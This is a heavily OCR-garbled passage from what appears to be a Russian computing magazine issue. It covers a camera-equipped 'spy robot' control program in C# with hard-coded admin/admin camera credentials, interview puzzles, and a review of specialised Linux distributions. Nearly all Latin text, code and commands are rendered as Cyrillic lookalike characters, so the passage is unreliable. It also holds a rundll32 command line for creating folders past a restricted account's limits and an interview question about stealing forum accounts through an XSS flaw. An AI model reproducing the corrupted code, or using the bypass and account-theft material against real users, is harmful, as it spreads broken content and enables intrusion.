сформированный запрос отправляется сервису дифференциального 
привода на выполнение. Аналогично действуют обработчики нажатия 
других кнопок. 

Обработчик нажатия кнопки РогмагсІ 

ргіѵа1;е ѵоісі Ь'СпРогмагс^СІіскСоЬзес* зепсіег, «-* 

Еѵеп1Аг§з е) { 

РогмагсІ(); 

> 



Метод РогмагсІ 

ѵоісі РогмагсІ() { 

_еѵепі:5Рогі: . Роз‘С(пем 0пМоѵе(тЬІ5, 

(іпі) орііопз.МоСіопБреесІ, ( іпі) орііопз .МоСіопБреесІ) ); 

} 

Метод ОпМоѵеНапсІІег 

ІЕпитега^ог < ІТазк > ОпМоѵеНапс11ег(ОпМоѵе опМоѵе) { 

// Создание запроса на движение 
сІгіѵе.Бе-ШгіѵеРомегКециезІ: гециезі: = 
пеы сігіѵе . 5е*0гіѵеРомегКецие5*( ) ; 
гециезІ.Іе-РіиіЬееІРомег = ♦-> 
опМоѵе. Ье-Рі:; 

гециезІі.КіеНіІлІбееІРомег = ^ 
опМоѵе. Рі§М:; 

сігіѵе. БеЮгіѵеРомег зсір = 4-< 
пед сігіѵе . 5еТ:0гіѵеРомег ( гециезі: ) ; 

// Создание временной задержки 

зсІр.ТітеБрап = 

ТітеБрап. РготМі11ізесопсІ5(500) ; 

_пхЮгіѵеРог1: . РозТ: ( зсір) ; 
уіеісі 

Ьгеак; 

} 

ЗАХВАТ ИЗОБРАЖЕНИЙ С КАМЕРЫ 

ІР-камера ТР-ЫІМК имеет встроенный веб-сервер, отправив которо- 
му НТТР-запрос можно получить изображение с камеры: Мір://<ір- 
адрес камеры>/сді-Ьіп/]рд/ітаде. Захват изображений с камеры 
реализован в методе беіСаппегаІтаде. Последний оператор 
данного метода активирует получателя, который срабатывает через 
ІітеЭеІау миллисекунд, и снова запускает метод ОеіСатегаІтаде. 
Таким образом организуется периодический вызов метода 
ОеіСатегаІтаде. 

Захват изображения с камеры 
ѵоісі Ое1:СатегаІта§е(Оа1:еТіте сІС) { 

ІТ (гипЛа§) { 

// Считываем изображение 

НПрІл/еЬКеяиеБі гец = (НСірІлІеЬКеяиезі:) 4 -і 
І лІеЬКедиезІ: . Сгеа1:е( м И1:1:р : // '* + сатегаНоз* + «-* 



иі орСіпшз <5 



СОВЕТ № 2: УМНЫЙ ПУЛЬТ ДЛЯ РОБОТА 
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После того как мы закончили со- 
бирать своего робота, встает вопрос 
об управлении «умным другом». Чтобы 
не гоняться за ним по коридорам 
с ноутбуком, можно использовать 
в качестве пульта Оріітиз 6. Большой 
экран позволит комфортно разглядеть 
картинку с веб-камеры робота, оценить 
ситуацию, а затем подключиться к веб- 
интерфейсу через браузер и отдать 
нужные команды. С помощью 115В- 
хоста и ВІиеІооіН к смартфону можно 
подключить внешнюю клавиатуру — 
это удобно, если роботу нужны длин- 
ные команды в 55Н/ТеІпеІ-сессии. 

Для более простых роботов 
на базе Міпсізіогплз для Апсігоіс) 



доступен официальный клиент 
от Седо ( аоо.дІ/УгХ9х С позволяющий 
запускать заранее определенные 
сценарии и подавать базовые коман- 
ды — например управлять сервомо- 
торами робота. 

Благодаря поддержке в Оріітиз б 
сетей 46 НЕ этим можно заниматься 
и вне дома. Это удобно для проектов, 
связанных с «умным домом» или 
видеонаблюдением. Проект такой си- 
стемы С6 продемонстировала в этом 
году на выставке СЕ5 под названием 
ЗтаПСопІгоІ: с помощью телефо- 
на можно управлять стиральной 
машиной, холодильником или даже 
пылесосом. 
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Рис. 4. Настройка параметров Боіиііоп 

* , /с8І-Ьіп/зр8/ітабе И ); 
гец.СгесІеп1:іаІ5 = пек БузТет.МеТ.— 

№ТѵюгкСгесІеп1:іа1( "асітіп", "асітіп") ; 

НТТрМеЬКезропзе гезр = (НТТрІл/еЬКезропзе) — 
гец.СеТКезропзеО ; 

5*геат зТт = ге$р.Се1:Ре5роп5е5*геат(); 

БузТет.Огаміпе. Іта§е іте = пем ВіТтар(5Тт); 
зТт.С1озе () і 

// Отображаем изображение в форме 
ВіТтар Ьтр = пем ВіТтар(іт§) ; 

БраипІТегаТог < Віітар > (Ьтр, 0ізр1ауІта§е) ; 

// Сохраняем изображение 

іт§.5аѵе(заѵера-1:Ь + "\\“ + СопѵегТ.То51:гіп§(і) + «-< 
н 5уз1:ет.0гаѵу»іпе.Іта§іп8.ІтаееРогта1:.(эі-Р) ; 
і = і + 1; 

} 

// Задержка на указанное время 
АсТіѵа1:е(АгЬі1ег. Весеіѵе(-Ра1зе, «-< 
ТітеоиТРогТ(ТітеОеІау), СеТСатегаІта§е)); 

} 

После захвата изображения оно отправляется в форму. 

Для этого сервис отправляет сообщение Рогтіпѵоке в порт 
ѴѴіпЕогтзЗегѵісеРогІ. В сообщении Рогтіпѵоке указывается делегат, 
который и записывает в компонент РісІигеВох изображение. 

Отправка изображения форме 

ІЕпитегаТог < ІТазк > 0ізр1ауІта§е(ВіТтар Ьтр) { 

Раиі* -Раиі* = пиіі; 

// Проверка наличия экземпляра формы 
ІР (_ЬгіѵеСопТго1 == пиіі) уіеісі 

Ьгеак; 

Рогтіпѵоке зеТІта§е = пей РогтІпѵоке(сІе1е§аТе() { 
_ЬгіѵеСопТго1.СатегаІта§е = Ьтр; 

»; 

} 

АКТИВАЦИЯ ОБРАБОТЧИКОВ 

После описания в коде сервиса обработчиков нужно связать их 
с портом _еѵепІзРогІ, на который приходят сообщения от формы. 
Обработчики сообщений формы можно разделить на обработчики, 
выполняющиеся эксклюзивно и параллельно. 

Эксклюзивность — это важная концепция в разработке сервисов. 
Состояние сервиса включает информацию, которую он использует 
в ходе своей работы, а также отправляет другим сервисам. Состояние 
сервиса всегда должно быть непротиворечивым. Если несколько 
потоков в один момент времени обновят состояние сервиса, то ре- 
зультат обновления предсказать будет нельзя. Поэтому любой метод, 
который обновляет состояние сервиса, должен быть эксклюзивным. 

Чтение состояния сервиса может выполняться параллельно не- 
сколькими обработчиками (параллельный обработчик не может быть 




Рис. 5. Форма для управления роботом 

запущен одновременно с эксклюзивным). Следовательно, ему всегда 
будет доступно непротиворечивое состояние сервиса. 

Описание обработчиков событий формы 

// Перехват событий от формы 

МаіпРог1ІпТег1еаѵе.СотЬіпеЫі1:Ь(АгЬі1:ег .Іп1:ег1еаѵе( 
пей ТеагсІо\л/пКесеіѵегСгоир( ), 
пем ЕхсІизіѵеЯесеіѵегбгоир 
( 

// Обработка событий формы 
АгЬіТег.Кесеіѵе<ОпІ.оас1>(1:гие, _еѵеп!зРогТ, 
ОпОгіѵеСопТгоНоасІНапсІІег) , 
АгЬіТег.Ресеіѵе<0пС1озе>(Тгие, _еѵепТзРог1:, «-■ 
ОпОгіѵеСопТгоІСІозесІНапЫег) , 

// Запрос на запись 

АгЬіТег.КесеіѵеИі*ЫТега1:ог<ОпРесогсІ>(Тгие, «-> 
_еѵепТзРог*, ОпКесогсІНапсІІег) 

Ь 

пей СопсигпепТРесеіѵегСгоир 

( 

// Обработка команд на перемещение робота 
АгЬіТег.РесеіѵеМіТЫТегаТог<ОпМоѵе>(1:гие, 

_еѵепТ5РогЬ, ОпМоѵеНапсІІег) 

) 

)); 

Обработчики ОпОгіѵеСопІгоНоасІНапсНег 
и ОпРгіѵеСопІгоІСІозесІНапсіІег помещены в группу эксклюзивных 
обработчиков, так как первый обработчик устанавливает значение 
переменной, а второй — инициирует завершение работы сервиса. 
Обработчик ОпМоѵеНапсІІег помещен в группу параллельно выполня- 
ющихся обработчиков, так как он не изменяет состояние сервиса. 

В зависимости оттого, является ли обработчик обычным методом 
или итератором для его активации (в целях последующей обра- 
ботки сообщений), используется метод АгЬііег.Весеіѵе или АгЬіІег. 
ВесеіѵеШЫіегаІог. 

ЗАКЛЮЧЕНИЕ 

Предлагаемый проект робота-шпиона далек от совершенства. 

Он немного шумный, потребляет много энергии, и следить с его по- 
мощью ты сможешь разве что за котом. Но! Этот проект может стать 
неплохим началом для твоих собственных разработок. Созданная 
программа для управления роботом без каких-то значительных из- 
менений может быть использована и для управления другим роботом 
(например, іРоЬоІ Сгеаіе). □□ 

ІШ1 

Просмотреть информацию о запущенном 055-узле и всех запущенных сервисах 
можно по адресу №(р://ІосаІЬо$(:50000 с помощью СИготе или ІЕ. Порт 50000 
используется по умолчанию для запуска гіввЬовІ. 
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кодинг 



Александр Лозовский ІАІехапЬегйгеаІ.хакер.ги) 



Задачи 4 

на собеседованиях 



Задачи от ІТ-компании 
СЫЗТІЗ (ѵтѵѵ.си5ІІ5.ги) 

ЗАДАЧА № 1 

ВОПРОС 

Перед игроком на столе лежит 12 монет — 7 орлом вверх, 5 решкой 
вверх. Игрок с завязанными глазами может раскладывать монеты 
на кучки и переворачивать монеты. 

Задача: выделить две кучки с гарантированно одинаковым 
(возможно, нулевым) количеством монет орлом вверх. Естествен- 
но, на ощупь положение монеты не определяется и кучки монет 
не могут быть пустыми. 

ОТВЕТ 

Берем любые 7 монет и выделяем их в кучку. Пусть х — количество мо- 
нет орлом вверх, тогда в другой кучке из 5 монет их 7 - х. Переворачива- 
ем монеты из первой кучки и получаем также 7-х монет орлом вверх. 

ЗАДАЧА № 2 

ВОПРОС 

Что будет в выводе консоли после выполнения метода РипТезН)? 

ргіѵаіе сіеіееаіе ТУ Рипс<ТХ, ТѴ>(ТХ х); 
ргіѵаТе ѵоісі РгіпТКези11:<ТѴ>(Рипс<іп-1:, ТѴ> Т) { 

Соп50Іе.ЫгіЬе1.іпе("{Ѳ},{1},{2}", *(1), *(2), *(3)); 

} 

риЫіс ѵоісі КипТе$Ь(){ 
ѵаг 1: = 0; 

Рипс<іпТ л іпТ> і = х => { * += х; геТигп X; }; 

X = 1; 

РгіпіРезиЩ-Р) ; 

} 

ОТВЕТ 

2,4,7 

Задачи отСгоир-ІВ 

ЗАДАЧА N ° 1 

ВОПРОС 

Какая процедура реализована в данном коде? 

Іеа Ьх,агг 
тоѵ сх,М 
$иЬ сх,1 
ІаЬеІІ: 

ри$Ь сх 

хог 5І,5І 

тоѵ Ьі,2 
тоѵ сх^-1 
1аЬе12: 



тоѵ ах,могЬ ріг [Ьх+5І] 
тоѵ сІх,могсІ р*г [Ьх+сіі] 
стр ах,сІх 
Зіе ІаЬеІЗ 

тоѵ могсі рХг [Ьх+бі],сіх 
тоѵ могсі ріг [Ьх+сіі], ах 
ІаЬеІЗ: 

асісі 5 І ,2 
асіО сіі,2 
Іоор 1аЬе12 
рор сх 

Іоор ІаЬеІІ 

ОТВЕТ 

В данном коде реализована процедура сортировки пузырьком: 

Іеа Ьх,агг ; адрес массива 
тоѵ сх,ІЧ ; количество элементов 
5иЬ сх,1 ; количество элементов - 1 
ІаЬеІІ: 
ри$Ь сх 

хог $і,5І ; обнуляем индекс текущего элемента 

тоѵ (И, 2 
тоѵ сх,М 
5иЬ сх,1 
1аЬе12 : 

тоѵ ах,могсІ рТг [Ьх+бі] ; берем элемент 
тоѵ с!х,\люгс1 рТг [Ьх+сіі] ; и следующий за ним 
стр ах,с!х ; сравниваем их 

ЗІе ІаЬеІЗ ; если первый больше или 

; равен второму, то не 
; меняем их 

тоѵ ыогсі ріг [ Ьх+5І ] , сіх ; обмен элементов 
тоѵ могсі рТг [Ьх+сіі], ах 
ІаЬеІЗ: 

асісі зі,2 ; указатели на следующие элементы 

аЬЬ сіі, 2 

Іоор 1аЬе12: ; повторяем внутренний цикл 

рор сх 

Іоор ІаЬеІІ ; повторяем внешний цикл 

ЗАДАЧА № 2 

ВОПРОС 

В ОС семейства ѴѴіпЬоѵѵв ХР существует команда, исполняемая 
через ВипЫІ32.ехе, с помощью которой можно создать каталоги 
даже там, где это под ограниченной учетной записью пользова- 
теля сделать нельзя. Например, в каталоге %и5егргоЯ1е%\1_оса1 
БеиіпдвМетрогагу Іпіегпеі РіІез\СопІепІ.ІЕ5. 

Укажите полную строку команды для требуемого действия. 

ОТВЕТ 

гипсІ1132.ехе АОѴРАСК.Ы1, РеІМосІеКипОи.32 - 
"путь к каталогу или файлу" 
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Задачи на собеседованиях 



Задачи от компании АВВѴѴ 



№1 

Дана строка 5, состоящая из N строчных символов латинского алфавита 
(то есть из символов от а до 2 ). Интервалом в строке будем называть упоря- 
доченную пару (і, і), такую, что 0 < і < ] < N. Будем называть интервал хоро- 
шим, если в подстроке, в которую входят все символы исходной строки Б 
с і-го по і-й включительно, находится не более І_ различных символов. Два 
интервала (іі, іі) и (І2, ] 2 ] являются различными, если либо іі * І2, либо П * 

\ 2 . Итак, даны числа N. I и строка 5. Требуется найти число различных хоро- 
ших интервалов в заданной строке 5. Предложите максимально эффектив- 
ный алгоритм решения, использующий разумное количество памяти. 



№2 

Дан неориентированный граф 0. Известно, что степень каждой вершины 
не превосходит 2, то есть каждой вершине соответствует не более двух 
ребер. Для графа делается довольно много (к штук) запросов вида ѵі ѵ2, где 
ѵі и ѵ2 — номера некоторых вершин в исходном графе. Для каждого из этих 
запросов потребуется либо выдать минимальное расстояние между верши- 
нами (минимальное в смысле количества ребер в пути, соединяющем две 
заданные вершины), либо выдать-1, если между ними нет путей. 

Предложите максимально эффективный алгоритм решения, использую- 
щий разумное количество памяти. 



Задача от «Лаборатории Касперского» 



У нас есть довольно посещаемый блог, где 
к каждой записи любой зарегистрированный 
пользователь может оставлять комментарии. 
Блок комментария имеет следующий формат: 



<аватар> 


<имя пользователя> 


<Текст комментария> 


Ответить 

Редактировать 

Удалить 



Нам достоверно известно, что поле <имя 
пользователя> не проходит никакой обработ- 
ки перед отображением на странице, то есть 
мы имеем типичную ХББ-уязвимость. 

Опишите схему атаки, чтобы завладеть 
учетными записями завсегдатаев форума. 
При каких предположениях нам удастся 
завладеть учетными записями? Что можно 
предпринять, чтобы предотвратить кражу 
учетных записей даже при наличии подобной 
уязвимости? 



Задача от ИГ-компании СІІ5ТІ5 



Следующий серверный код на ^ѵа осуществляет обработку документа, полученного из входяще- 
го сообщения ЛЧ5, в процессе которой выполняет операции с базой данных и отправляет в ответ 
подтверждение. От заказчика появилось требование вести в базе данных журнал обработки со- 
общений, в который необходимо записывать информацию о результатах обработки. Для этого был 
реализован сервис І_од5егѵісе с методом Іод(5ігіпд теззаде, ТЬгоѵѵаЫе саизе). 

Измените приведенный код, добавив запись в журнал любых результатов обработки и обеспечив 
корректную обработку ошибок: 

(ЗТгапзасТіопаІ 

риЫіс ѵоіО ргосеззОоситеп-ЦОоситепТ сіоситепТ) ТНгомз БегѵісеЕхсерТіоп, ^ 
Мезза§іп§Ехсер-1:іоп { 

і-Г (ізѴа1ісІ(сІоситеп-1:)) { 
сІоситепТБегѵісе. зТоге(сІоситепТ ) ; 

тезза§іп§5егѵісе . зепсІ(Аскпом1ес1§етеп-1:5 . сІоситеп1:КесеіѵесІ(сІоситеп1:1:) ) ; 

} еізе { 

теззаеіпеБегѵісе . зепс!(Аскпоѵу/1ес1еетепІ5 . сІоситеп-СІпѵаІісІ^оситепІ) ) ; 

} 

} 

Расскажите, как можно протестировать полученный код. 

Расскажите, как должен быть реализован метод аисііі, чтобы гарантировать запись в журнал 
любых результатов. 

Бонус: читателю-правильно-решателю компания обещает подарочек. Какой? А сюрприз! 



Задачи от компании БоМіпе 



№1 

Что выведет данный скрипт? Объясните почему. 
<?рЬр 

ТипсТіоп -Рп(&$ѵаг) 

{ 

$ѵаг = $ѵаг - ($ѵаг/10 * 5); 
геТигп $ѵаг; 

} 

есНо 'Рп(ІѲѲ); 

?> 



N8 2 

Как можно сделать анимированную иконку средствами только 
С55 с анимацией части изображения без использования рас- 
трового фона (см. рисунок)? 

Бонус читателю: Кандидат, успешно справившийся с за- 
дачей, может быть приглашен на очное собеседование либо 
сможет получить возможность обучения или прохождения 
стажировки в офисах департамента разработки БоКІіпе (Та- 
ганрог, Оренбург, Новосибирск, Воронеж). Успешные канди- 
даты, приславшие резюме, пройдут собеседование и получат 
шанс трудоустройства. 



(й 

(О 



Айтишные компании! 
Шлите нам свои задачки! 



Есть интересные задачки и хочется поделиться 
ими с нашими читателями? Не нужно держать это 
в себе! Пишите редактору рубрики: ІогоѵгкуОдІс. 
ги, и, если ваша задачка будет свежей и инте- 
ресной, мы с удовольствием поставим ее перед 
нашими читателями. Бесплатно, без регистрации, 
капчи и 5М5! :) 



Любишь решать задачи, готовишься к собеседо- 
ваниям? Так решай! И шли свое решение на мое 
мыло. Решишь правильно — опубликуем твой 
ответ, а то и наградим бонусом от компании — по- 
ставщика вопроса. 
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ІМІХОЮ 



Сергей Яренчук (дгіпсіегйіих.іп.иа) 
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ЛЗШРИЧИР Н 


Іій 





Мультимедийные дистрибутивы пред- 
назначены для комфортного просмотра 
и прослушивания медиаконтента, работы 
с фотографиями, графическими и ЗР редак- 
торами. Ядро оптимизировано для обработки 
мультимедиа в режиме реального времени, 
гарантируя минимальное время реакции и вы- 
сокую отзывчивость системы. Среди активных 
проектов наиболее популярен ІІЬипІи Біисііо 
( іЬипіуБіигііо.огг]), поддержкой которого за- 
нимается СапопісаІ. Он представляет собой 
базовый дистрибутив, укомплектованный 
тщательно подобранным софтом и различными 
мультимедийными плагинами. Многие пользо- 
ватели находят это удобным, так как не требу- 
ются дополнительные телодвижения, все идет 
из коробки. 

Альтернатива ІІЬипІи Біисііо — КХБіисііо 
( хзіигі іо.зі .пеі) . также базирующийся 
на ІІЬипІи и содержащий почти аналогичный 
софт, только в качестве рабочей среды ис- 
пользуется КйЕ. Пользователям ІІЬипІи / Ыпих 
Міпі дооснастить систему всем необходимым 
позволит специальный метапакет: 



$ зисіо асІсі-арТ-герозі-Ьогу - 
рра : кх5ІисІіо-1:еат/кх5І:исііо 
$ зисіо арТ-§еТ ирсіа-Ье 
$ зисіо арТ-^еТ іпзТаІІ кхзТисІіо-героз 
$ зисіо арТ-ееТ ирсІаТе 



После чего команда зисіо арІ-сасЬе зеагсЬ 
кхзіисііо покажет наличие нескольких ме- 
тапакетов, предназначенных для установки 
определенных групп приложений. 

Дистрибутив АгІізіХ (ранее Мебіаіпііпих, 
агіІ5Іх.огд ! базируется на 12.04 1_Т5 версии 
ІІЬипІи (с некоторыми поздними обновлени- 
ями), йѴй включает рабочие среды 6Ы0МЕ 3 
и КйЕ 4.8 и около 2500 свободных мультиме- 
диапакетов. 

Еще один интересный вариант — йгеат 
Біисііо ( сіісктасіппіз.сот/сігеаппзіисііо ). который 
распространяется в виде ІБО-образа дистри- 
бутива и как установочный скрипт для са- 
мостоятельного развертывания в ІІЬипІи. 
Последний вариант будет удобен и для поль- 
зователей 1_іпих Міпі. Просто запускаем скрипт 
из консоли, выбираем любые из десяти пред- 
ложенных категорий софта и ждем окончания 
процесса установки. Среди приложений можно 
выделить СіпеІегга, Агсіоиг, СіпеРаіпІ, ВІепсІег, 
Іпкзсаре, Бупіід Біисііо, Котроіег, биііагіх. 

Дистрибутив Ригегіупе также содержит 
расширенный комплект инструментов, на- 
целенных на подготовку и обработку графики, 
звука и видео. Базируется на ІІЬипІи и рас- 
пространяется в виде сокращенной Сй-версии 
и более полного РѴО-образа, обе сборки могут 
быть установлены на 1)5В РІазЬ. Единственный 
минус — проект полтора года не обновлялся 



іи 
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ОБЗОР СПЕЦИАЛИЗИРОВАННЫХ 
ДИСТРИБУТИВОВ иыііх 



Количество специализированных дистрибутивов на порядок боль- 
ше, чем решений для общего использования, они востребованы 
и популярны. Их разработчики не только тщательно подбирают софт, 
но и пересобирают ядро и компоненты, чтобы обеспечить удобство 
работы и большую производительность в конкретных задачах. 



Отряды 

специального 

назначения 



Отряды специального назначения 





НауЛинукс поставляется как дополнительный диск Дистрибутив Ригеііупе буквально напичкан софтом 

к ЗсіепШіс Ыпих СугіІІіс ЕсШіоп для обработки мультимедиа 



(хотя заброшенным не считается). Последняя 
версия системы — 9.11. 



МЕДИАСТАНЦИЯ НА І_ІЫЦХ 



В большинстве своем решения для обработки 
мультимедиа не предназначены для работы 
в качестве медиастанции. Между тем Ыпих 
богат специализированными проектами, 
позволяющими превратить ПК в медиацентр 
и управлять просмотром медиаконтента из од- 
ной оболочки: МуіЬТѴ ( тѵіЫѵ. огд). ХВМС Месііа 
Сепіег І хЬтс.огд ) и Егееѵо Кгееѵо.вГ.пеі ). С их 
помощью можно просматривать ТѴ, слушать 
онлайн-радио, читать Р55, играть в игры, ска- 
чивать файлы из интернета, узнавать прогноз 
погоды и многое другое. При этом поддержи- 
вается удаленное управление при помощи 
ИК-пульта, ВІиеІооіЬ, беспроводной клавиату- 
ры или через веб-интерфейс. Нужные пакеты 
доступны в репозиториях всех дистрибутивов 
Ыпих, правда, их еще нужно соответству- 
ющим образом настроить. Чтобы избавить 
пользователя от головной боли, появились 
специализированные дистрибутивы, которые 
легко устанавливаются и предлагают уже 
преднастроенное окружение. С их помощью 
можно минут за десять развернуть домашний 
медиацентр. И выбирать здесь есть из чего. 

Например, МуіНЬипІи І ѵтѵѵ.тѵіЬЬипІи.огд ) 
базируется на ІІЬипІи и МуіЬТѴ, причем, в от- 
личие от некоторых других подобных проектов, 
он может использоваться и в качестве обыч- 
ного УЬипІи-десктопа (установлен ХРСЕ), если 
в этом будет необходимость. Все настройки 
производятся при помощи МуіЬЬипІи Сопігоі 
Сепіге. Кстати, дистрибутив отлично работает 
в Ыѵе-режиме, поэтому ставить его на хард 
совсем необязательно. 

Сторонники АгсЬ Ыпих, вероятно, предпо- 
чтут І_іпНЕ5 (Ыпих Ноте Епіегіаіптепі Бузіет, 
п Ьев.огс ). Функционально он схож с преды- 
дущим, для упрощения конфигурации здесь 
используется МуІЬѴапІаде. Еще один канди- 
дат — Саісиіаіе Месііа Сепіег ( саісиіаіе-ііпих.ги) 
построен на базе бепіоо и не содержит ничего 
лишнего, а только ХВМС и сопутствующие про- 
граммы, плагины, кодеки и утилиты (вклю- 
чая торрент-клиент, ВОР-клиент гсіезкіор 
и другие), собственно, поэтому он получился 
легче и производительнее своих одногруппни- 



ков. Может работать с 1_іѵеСР или 115В, после 
загрузки ОС сразу появляется оболочка ХВМС, 
в которой можно выбирать источник данных. 
Доступны инструменты, позволяющие создать 
свою версию дистрибутива. 

К сожалению, проект Ргееѵо прекратил раз- 
витие, и все дистрибутивы, использующие его 
за основу, практически неактивны. 

Несколько в стороне стоит ѴогІехВох 
( ѵогІехЬох.со.ик) — дистрибутив, базирую- 
щийся на Ребога и предназначенный для ис- 
пользования в качестве музыкального сервера 
и МАБ. ѴогІехВох автоматически кодирует 
вставленные в привод Сй-диски в РІ_АС или 
МРЗ, с добавлением тегов и обложек, индек- 
сирует коллекцию, хранит пользовательские 
файлы (документы, медиа, фото и прочее), 
транслирует потоки другим системам по сети 
(в том числе и беспроводной). Управление 
возможно с іРоб/іРаб/Апбгоіб, ИК-пульта или 
через веб-браузер. Распространяется в виде 
150-образа или готового устройства. 

Дистрибутив РібЛХ (сіс] х сіодзро: Т) пред- 
ставляет собой готовое решение для диджеев, 
построенное на Міххх, работает в І_іѵе-режиме 
с 115В РІазИ. В его основе лежит АгсЬЫпих. 



НАУЛИНУКС 



В образовательной среде интерес к Ыпих всегда 
был высок, это направление развивалось очень 
активно, в том числе и при участии различного 
рода учебных заведений, научно-исследова- 
тельских проектов и специальных программ. 

В результате имеем большое количество прило- 
жений, которые для удобства стали объединять 
в дистрибутивы — ЕбиЬипІи (построен на ІІЬипІи 
и продвигается СапопісаІ), 5сіеп1і1іс Ыпих 
(база ВНЕЦ создан при поддержке РегтіІаЬ, 
СЕРІМ и ряда университетов), ЕбиМапбгіѵа 
(е битапб гі ѵа.г и. сборка Мапбгіѵа для обра- 
зовательных целей, поддерживается компа- 
нией Мапбгіѵа) и другие. Среди них ЕбиЬипІи 
наиболее активно развивающийся, его версии 
выходят вместе с новым релизом базового дис- 
трибутива. Но по рейтингу ОізІгоѵѵаІсЬ лидирует 
менее известный у нас и более консервативный 
в развитии БсіепіЖс Ыпих, который представля- 
ет собой стабильный дистрибутив корпоратив- 
ного уровня с обновлениями и техподдержкой. 

И наверное, особое место в списке специализи- 



рованных решений занимают два дистрибутива, 
продвигаемые российской компанией ОАО Ли- 
нукс Инк ( паиііпих.ги ) — Бсіепііііс Ыпих СугіІІіс 
ЕФііоп (5І_СЕ) и НауЛинукс. По сути, оба являют- 
ся локализованной версией БсіепМіс Ыпих (5І_) 
и следуют за релизами 5І_/РНЕІ_ с сохранением 
нумерации (чтобы легче было отследить базовую 
версию). Кроме полной локализованной пере- 
сборки, в дистрибутивы включены раскладки 
клавиатуры для работы на нескольких нацио- 
нальных языках народов РФ, соответствующие 
интерфейсы для программ и дополнительные 
словари. С учетом потребностей пользователя 
изменен состав базового ПО по сравнению с 5І_, 
в поставку включено более 300 программных 
пакетов, адаптирована процедура установки. 
Набор приложений позволяет развернуть сер- 
вер, организовать рабочую среду пользователя 
или разработчика. Возможно создание кластера. 
В настоящее время проект предлагает две вет- 
ки: 5.x и 6.x, при этом НауЛинукс поставляется 
как дополнительный диск к 5І_СЕ (ранее он шел 
как отдельный дистрибутив), который содер- 
жит образовательные программы, программы 
для работы с мультимедиа, средства разработки, 
управления ЮАР, ЫЬгеСЖісе, браузер Ріге^ох 
и другое ПО. Версия 5.x построена несколько 
иначе и содержит набор дополнительных кон- 
фигураторов, школьный веб-портал на основе 
СМ5 РІопе, систему администрирования служб 
и контроля доступа ОфисМастер. 



УМНЫЙ ДОМ 



Концепция умного дома предполагает объ- 
единение всех электроустройств в единую си- 
стему, управляемую с одной точки. На сегодня 
доступно большое количество специализи- 
рованных адаптеров, позволяющих подклю- 
чить практически все к компьютеру, поэтому 
при наличии определенных навыков и ПО все 
можно сделать самостоятельно. Дистрибутив 
Ыпих Месііа Сепіег Ебіііоп ( Ііпихтсе.огд) — 
больше чем просто медиастанция, как это 
может показаться из названия. Возможность 
проигрывания и трансляции аудио и видео, 
запись передач на диск (в основе МуіЬТѴ 
и Хіпе) — это только верхушка айсберга. ПО, 
заложенное в ЫпихМСЕ, позволяет управлять 
любыми устройствами в доме (различные 
выключатели, климат-контроль и прочее) 
и системой охраны, записывать все события 
с помощью аналоговых/ІР/веб-камер. Кроме 
этого, можно развернуть сеть ІР-телефонии 
(на базе Азіегізк), которая будет использо- 
ваться для связи, удаленного управления 
устройствами, отправки 5М5 или вызова 
определенного номера в случае наступления 
определенных событий. Управление в преде- 
лах дома производится через I РИА, ВІиеІооіЬ 
или ѴѴі-Рі, за пределами — при помощи 
телефона или компьютера, что позволяет 
контролировать дом и управлять им прак- 
тически на любом расстоянии. Графический 
интерфейс управления называется ОгЬіІег, 
проект предлагает несколько вариантов: 
экранный (выводится на ТѴ), для управления 
с ПДУ или клавиатуры; универсальный с веб- 
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Саісиіаіе Месііа Сепіег — загрузил и смотри 




ВаскВох содержит коллекцию из более чем 70 инструментов для проведения оценки 
безопасности системы 



интерфейсом; мобильный, представляющий 
собой телефон; ПК или КПК, подключенные 
через ѴѴі-Рі. Функция ІоІІоѵѵ-те обеспечива- 
ет автоматическое перенаправление меню 
системы на устройства, вблизи которых на- 
ходится пользователь. Сценарии позволяют 
выполнять автоматические действия в случае 
наступления некоторого события или крите- 
рия (время суток). Для удобства предусмотрен 
интерактивный план дома, в котором указы- 
вается расстановка устройств. 

В основе ЫпихМСЕ лежит КиЬипІи. Система, 
построенная на ЫпихМСЕ, состоит из ряда 
функциональных компонентов (Соге, Медіа 
йігесіог), и для развертывания потребуется 
один, но лучше несколько серверов. При этом 
Медіа Оігесіог можно использовать в качестве 
обычного десктопа. Единственный минус — 
проект развивается очень медленно, текущая 
официальная версия основана на КиЬипІи 
10.04. Кроме того, доступна коммерческая 
версия ЫпихМСЕ (разрабатывается британ- 
ской компанией Оіапето), которая построена 
на 12.04 1_Т5. 




В процессе эксплуатации ПК нередко воз- 
никает задача переразметить жесткий диск 
или восстановить систему после сбоев. В этом 
случае на помощь придут специальные дис- 
трибутивы, которые должны обязательно 
быть в комплекте продвинутого пользователя. 
Один из них — ІІЬипІи Резсие Ретіх ( Ьипіи- 
5сие_- ■ ••тіх. огд ) — содержит инструменты 
для управления разделами жесткого диска 
и файловыми системами, восстановления 
данных (РЬоІогес, йдгезсие, Рогетозі, Аиіорзу, 
тадісгезсие и так далее). Актуальная версия 
основана на пакетной базе ІІЬипІи 12.04. 

В уже установленном ІІЬипІи все инстру- 
менты можно скачать при помощи специально- 
го метапакета: 



$ зидо адд-ар'С-герозі'Согу -< 

рра : аггазас/иЬип-Си 

$ зидо арС-^еІ: ирдаТе 

$ зидо ар1-§еТ: іпзіаіі иЬипІи-гезсие-*-* 

гетіх-ііооіз 

Все примеры использования входящих 
в состав утилит приведены в файле /гооі/ 
СЬеаіБЬееІЛхІ. 

Ну и не забываем о прекрасно за- 
рекомендовавших себя Рагіед Мадіс 05 
( рагіедтадіс.сот ). ОРагіед ( юагіед.зі.пеіі 

и БузІетРезсиеСд (Б ѵзгезссд.ог с). которые 
содержат все необходимые инструменты 
для управления разделами харда, восста- 
новления данных, тестирования и клони- 
рования дисков, бэкапа данных. В поставку 
ЗузІетРезсиеСд входят дополнительные ин- 
струменты для диагностики харда, определе- 
ния оборудования, восстановления удаленных 
файлов, сброса/редактирования пароля адми- 
нистратора ѴѴіпдоѵѵз, удаления информации 
без возможности восстановления. 

Если же источником проблем в системе яв- 
ляются вирусы, то следует пройтись по сайтам 
антивирусных компаний. Некоторые из них 
предлагают сборку на Ыпих, позволяющую 
проверить систему, загрузившись с компакт- 
диска или 115В: Аѵіга АпІіѴіг Везсие Бузіет, 
ВіШеІепдег Везсие СО, йг.ѴѴеЬ ЫѵеСО/ЫѵеІІБВ, 
КазрегБку Везсие 0І5к, ѴЬа32 Везсие. 



СПЕЦАМ ПОСЕКЬЮРИТИ 



Список Ыпих-дистрибутивов, предназначенных 
специалистам по безопасности, всегда был 
внушительным, некоторые проекты со време- 
нем прекращали свое развитие, но их место 
занимали другие. Каждый был по-своему 
